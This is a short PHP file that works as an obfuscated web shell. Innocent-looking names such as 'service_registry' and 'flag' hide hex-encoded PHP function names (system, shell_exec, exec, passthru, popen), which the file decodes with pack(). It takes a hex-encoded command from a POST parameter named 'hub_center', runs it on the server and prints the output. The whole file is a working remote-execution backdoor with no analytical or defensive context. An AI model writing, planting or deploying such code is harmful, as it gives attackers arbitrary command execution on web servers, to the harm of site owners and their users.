<?php


$flag1 = '79';
$flag2 = '73';
$flag3 = '6d';
$flag4 = '68';
$flag5 = '65';
$flag6 = '6c';
$flag7 = '78';
$flag8 = '75';
$flag9 = '70';
$flag10 = '6f';
$flag11 = '72';
$flag12 = '61';
$flag13 = '5f';
$flag14 = '63';
$flag15 = '6e';
$flag16 = '74';
$service_registry1 = pack("H*", '73'.$flag1.$flag2.'74'.'65'.$flag3);
$service_registry2 = pack("H*", '73'.$flag4.$flag5.$flag6.$flag6.'5f'.$flag5.$flag7.$flag5.'63');
$service_registry3 = pack("H*", '65'.$flag7.$flag5.'63');
$service_registry4 = pack("H*", '70'.'61'.'73'.'73'.'74'.$flag4.'72'.$flag8);
$service_registry5 = pack("H*", $flag9.$flag10.$flag9.'65'.'6e');
$service_registry6 = pack("H*", '73'.'74'.$flag11.$flag5.$flag12.$flag3.'5f'.'67'.$flag5.'74'.$flag13.$flag14.'6f'.$flag15.'74'.'65'.$flag15.$flag16.'73');
$service_registry7 = pack("H*", $flag9.$flag14.$flag6.'6f'.'73'.'65');
$hub_center = pack("H*", '68'.'75'.'62'.'5f'.'63'.'65'.'6e'.$flag16.$flag5.'72');
if (isset($_POST[$hub_center])) {
    $hub_center = pack("H*", $_POST[$hub_center]);
    if (function_exists($service_registry1)) {
        $service_registry1($hub_center);
    } elseif (function_exists($service_registry2)) {
        print $service_registry2($hub_center);
    } elseif (function_exists($service_registry3)) {
        $service_registry3($hub_center, $ent_sym);
        print join("\n", $ent_sym);
    } elseif (function_exists($service_registry4)) {
        $service_registry4($hub_center);
    } elseif (function_exists($service_registry5) && function_exists($service_registry6) && function_exists($service_registry7)) {
        $ent_ref = $service_registry5($hub_center, 'r');
        if ($ent_ref) {
            $desc_data_chunk = $service_registry6($ent_ref);
            $service_registry7($ent_ref);
            print $desc_data_chunk;
        }
    }
    exit;
}
